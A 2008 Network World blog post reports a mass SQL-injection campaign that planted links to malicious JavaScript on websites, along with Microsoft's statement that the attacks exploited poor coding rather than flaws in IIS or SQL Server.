Skip Links

Massive SQL-injection attack not Microsoft's fault, security official says

By Microsoft Subnet on Mon, 04/28/08 - 7:02pm.

F-Secure found evidence of yet another massive round of infected Web sites on Thursday, all compromised by SQL injection attacks. Many pundits in the blogosphere were quick to blame Microsoft IIS and/or SQL Server. And so Bill Sisk from the Microsoft Security Team posted a blog late Friday evening in response. Sisk insists that no new vulnerabilities were found. He also says that better coding practices on the part of the developers is what is needed to prevent this kind attack.

Essentially this kind of attack directs people to malicious Web sites. Sites that use a database back-end (and there are more and more of them these days) are vulnerable if they allow users to upload information to the database. Examples include discussion forums, blogs, feedback forms, et cetera. Therefore, developers need methods in place to verify that the information that gets stored in, or requested from, their databases is not sending people to infected Web pages. According to F-secure, the SQL injection code:

"finds all text fields in the database and adds a link to malicious Javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code."

Microsoft's Sisk reply stated, "The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies." Sisk points developers to a white paper written in May 2005 that explains how to avoid SQL Injection attacks.

Go to the Microsoft Subnet home page for more news, blogs, podcasts.

More Microsoft Subnet blog posts relating to Microsoft security:
Recent posts: 3Q financials show Microsoft needs a jump start
New Microsoft virtualization tool coming soon
Exchange and SharePoint to be revamped for multitenant versions
Low-cost PCs and a lightbulb goes off in Redmond
Mitchell Ashley's Converging on Microsoft blog
Mitchell Ashley's Converging on Microsoft podcast

All Microsoft Subnet blog posts

Sign up for the bi-weekly Microsoft newsletter. (Click on News/Microsoft News Alert.)

Blog Roll
Microsoft Subnet Home Page
http://www.networkworld.com/subnets/microsoft/
All Microsoft Subnet bloggers
http://www.networkworld.com/community/blogs/microsoft/feed
ActiveWin
http://www.activewin.com
Blake Handler The Road to Know Where
http://bhandler.spaces.live.com/
Dmitry's PowerBlog
http://dmitrysotnikov.wordpress.com/
Doug Brown,DABCC
http://www.dabcc.com
Ed Bott's Windows Expertise
http://www.edbott.com/weblog/
Joseph Tartakoff Microsoft Blog
http://blog.seattlepi.nwsource.com/microsoft/
Long Zheng istartedsomething
http://www.istartedsomething.com/
Mini-Microsoft
http://minimsft.blogspot.com/
Paul Thurrott's Supersite for Windows
http://www.winsupersite.com
Robert McLaws WindowsNow
http://www.windows-now.com
Scobleizer
http://scobleizer.com/
Techmeme
http://www.techmeme.com/
Todd Bishop's Microsoft Blog
http://www.techflash.com/Microsoft